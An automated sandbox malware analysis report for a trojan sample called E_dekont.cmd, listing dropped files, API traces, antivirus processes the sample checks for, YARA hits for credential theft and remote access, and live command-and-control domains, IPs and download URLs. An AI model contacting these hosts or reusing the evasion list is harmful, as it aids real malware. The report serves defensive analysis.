                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: GetLocaleInfoA,12_1_00417A20
                Source: C:\Users\Public\alpha.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,13_2_00018572
                Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,13_2_00016854
                Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,13_2_00019310
                Source: C:\Users\Public\alpha.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,17_2_00018572
                Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,17_2_00016854
                Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,17_2_00019310
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,27_2_029B5ACC
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,27_2_029B5BD7
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: GetLocaleInfoA,27_2_029BA810
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: GetLocaleInfoA,30_2_00417A20
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: GetLocaleInfoA,30_1_00417A20
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,36_2_029D5ACC
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,36_2_029D5BD7
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: GetLocaleInfoA,36_2_029DA810
                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\alg.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\Public\alpha.pifQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\AppVClient.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TSTF44A.tmp VolumeInformation
                Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TSTF45B.tmp VolumeInformation
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifQueries volume information: C:\ VolumeInformation
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\System32\msdtc.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifQueries volume information: C:\ VolumeInformation
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\System32\Locator.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\SensorDataService.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\snmptrap.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\Spectrum.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02AF920C GetLocalTime,4_2_02AF920C
                Source: C:\Windows\System32\AppVClient.exeCode function: 22_2_00740080 VirtualFree,VirtualFree,VirtualAlloc,GetUserNameW,GetComputerNameW,GetComputerNameW,22_2_00740080
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02AFB78C GetVersionExA,4_2_02AFB78C
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: avgemc.exe
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                Stealing of Sensitive Information

                Source: Yara matchFile source: Process Memory Space: wdmvmswJ.pif PID: 2056, type: MEMORYSTR
                Source: Yara matchFile source: 0000001E.00000003.1663470654.00000000244EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.1777354937.000000002657E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.1848938336.00000000213F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.1798010411.0000000029240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.1840076965.000000001E8BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.1553023677.000000001E8E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.1795060712.00000000279E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.1840971745.000000001EB40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.1782173123.00000000268B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000003.1766990632.000000001C684000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.1842028459.000000001EDB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.1842028459.000000001ED41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.1782690545.0000000026A57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: wdmvmswJ.pif PID: 2056, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match, File source: Process Memory Space: wdmvmswJ.pif PID: 2056, type: MEMORYSTR

                [MITRE ATT&CK matrix; columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact]

                [Behavior graph; Behavior Graph ID: 1546600, Sample: E_dekont.cmd, Startdate: 01/11/2024, Architecture: WINDOWS, Score: 100]

                Source | Detection | Scanner | Label | Link
                E_dekont.cmd | 45% | ReversingLabs | Win32.Trojan.ModiLoader |
                E_dekont.cmd | 47% | Virustotal | | Browse

                Source | Detection | Scanner | Label | Link
                C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | 100% | Avira | W32/Infector.Gen |
                C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Joe Sandbox ML | |
                C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Joe Sandbox ML | |
                C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Joe Sandbox ML | |
                C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | 100% | Joe Sandbox ML | |
                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | 100% | Joe Sandbox ML | |
                C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Joe Sandbox ML | |
                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | 100% | Joe Sandbox ML | |
                C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Joe Sandbox ML | |
                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | 100% | Joe Sandbox ML | |
                C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Joe Sandbox ML | |
                C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Joe Sandbox ML | |
                C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Joe Sandbox ML | |
                C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | 100% | Joe Sandbox ML | |
                C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe | 100% | Joe Sandbox ML | |
                C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%Joe Sandbox ML
                C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%Joe Sandbox ML
                C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%Joe Sandbox ML
                C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%Joe Sandbox ML
                C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%Joe Sandbox ML
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                uaafd.biz | 12% | Virustotal | | Browse
                xnxvnn.biz | 14% | Virustotal | | Browse
                nlscndwp.biz | 11% | Virustotal | | Browse
                vjaxhpbji.biz | 14% | Virustotal | | Browse
                No Antivirus matches
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                                                                                                                                                                                              napws.biz
                                                                                                                                                                                              35.164.78.200
                                                                                                                                                                                              truefalse
                                                                                                                                                                                                cvgrf.biz
                                                                                                                                                                                                54.244.188.177
                                                                                                                                                                                                truetrue
                                                                                                                                                                                                  lpuegx.biz
                                                                                                                                                                                                  82.112.184.197
                                                                                                                                                                                                  truetrue
                                                                                                                                                                                                    vcddkls.biz
                                                                                                                                                                                                    18.141.10.107
                                                                                                                                                                                                    truetrue
                                                                                                                                                                                                      wluwplyh.biz
                                                                                                                                                                                                      18.141.10.107
                                                                                                                                                                                                      truetrue
                                                                                                                                                                                                        vyome.biz
                                                                                                                                                                                                        18.246.231.120
                                                                                                                                                                                                        truetrue
                                                                                                                                                                                                          dlynankz.biz
                                                                                                                                                                                                          85.214.228.140
                                                                                                                                                                                                          truefalse
                                                                                                                                                                                                            reczwga.biz
                                                                                                                                                                                                            44.221.84.105
                                                                                                                                                                                                            truefalse
                                                                                                                                                                                                              xccjj.biz
                                                                                                                                                                                                              18.246.231.120
                                                                                                                                                                                                              truetrue
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                                                                                                                                                                                                                                                        http://44.221.84.105/alg.exe, 00000010.00000003.1637081830.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1690720549.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1671538833.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1660027657.000000000057B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                          http://208.100.26.245/bh.Talg.exe, 00000010.00000003.2028087857.0000000000541000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                            http://bumxkqgxu.biz/alg.exe, 00000010.00000003.2066991172.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000541000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                              http://34.246.200.160/wnelecid4alg.exe, 00000010.00000003.2573388226.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2596159011.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2599209394.00000000005CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                http://18.141.10.107/idnuvngsalg.exe, 00000010.00000003.1690720549.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1697189867.000000000057B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                  https://chichometextiles.com:443/wp-admin/233_Jwsmvmdweyahx.exe, 00000004.00000002.1544141056.000000000072F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                    https://chichometextiles.com/x.exe, 00000004.00000002.1544141056.0000000000706000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                                                                                                                                                                                                      http://18.208.156.248/aoayitmlcurkmalg.exe, 00000010.00000003.2415414669.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2431778883.00000000005CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                        http://www.pmail.comx.exe, x.exe, 00000004.00000002.1544141056.0000000000780000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1478142210.0000000002959000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1596172530.000000007FE2F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1588992126.0000000021CF5000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1478393290.000000007FBDF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1555508277.000000000295A000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002084D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1588565232.0000000021AF0000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000000.1541408812.0000000000416000.00000002.00000001.01000000.00000007.sdmp, wdmvmswJ.pif, 0000001E.00000000.1659150073.0000000000416000.00000002.00000001.01000000.00000007.sdmp, wdmvmswJ.pif, 00000026.00000000.1748296146.0000000000416000.00000002.00000001.01000000.00000007.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                          http://82.112.184.197/pe6alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmpfalse
